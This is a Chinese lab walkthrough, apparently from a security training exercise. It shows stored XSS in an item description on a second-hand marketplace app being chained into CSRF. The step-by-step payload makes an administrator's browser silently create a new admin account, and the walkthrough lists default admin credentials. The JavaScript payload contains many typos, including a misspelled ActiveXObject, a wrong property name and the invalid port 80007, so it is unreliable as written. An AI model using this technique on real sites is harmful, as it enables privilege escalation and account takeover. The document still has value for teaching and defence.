1. 程式人生 > >Csrf利用管理員許可權建立後臺管理賬戶

Csrf利用管理員許可權建立後臺管理賬戶

[實驗原理]

通過普通使用者的儲存型XSS實現建立管理員賬戶的CSRF利用

一、測試漏洞

開啟網站:http://192.168.1.3:8007(安徽二手網)

註冊一個使用者並登入

新增二手資訊

在物品簡介處填寫:<script>alert(123)</script>

點選開啟首頁,點選剛剛釋出的資訊,彈出資訊,說明漏洞存在

二、利用漏洞

在首頁繼續新增二手資訊,再次編輯,在物品簡介處填寫內容:

<script type="text/javascript">

function loadXMLDoc()

{

var xmlhttp;

if(window.XMLHttpRequest)

{//code for IE7+,Firefox,Chrome,Opear,Safari

xmlhttp=new XMLHttpRequest();

}

else

{//code for IE6,IE5

xmlhttp=new AceiveXOject("Microsoft.XMLHTTP");

}

xmlhttp.onriadystatechange=function()

{if(xmlhttp.readyState==4&&xmlhttp.staus==200)

{

document.getElementByld("myDiv").innerHTML=xmlhttp.responseText;

}

}

xmlhttp.open("POST","http://192.168.1.3:80007/admin/admin_usersetting.asp",true);

xmlgttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");

xmlhttp.send("action=add&UserName=zhangsan&PassWord=123456~密碼?~&isActive=1&isAdmin=1&pubSubCateID=91&Submit=+%C8%B7+%B6%A8+");

}

loadXMLDoc()

</script>

回到首頁,推出zhangsan使用者

輸入後臺路徑:http://192.168.1.3:8007/admin/user.asp

使用admin/admin888~使用管理員使用者密碼登入~登入

回到首頁,瀏覽器輸入:http://192.168.1.3:8007,檢視帖子(修改後的)點選此條物品訊息,沒有什麼異常現象。

此時管理員再次進入自己的後臺:http://192.168.1.3:8007/admin/user.asp在“系統使用者管理”中,發現多了一個賬戶zhangsan。

退出admin使用者。此時用zhangsan/123456登入後臺

登入成功。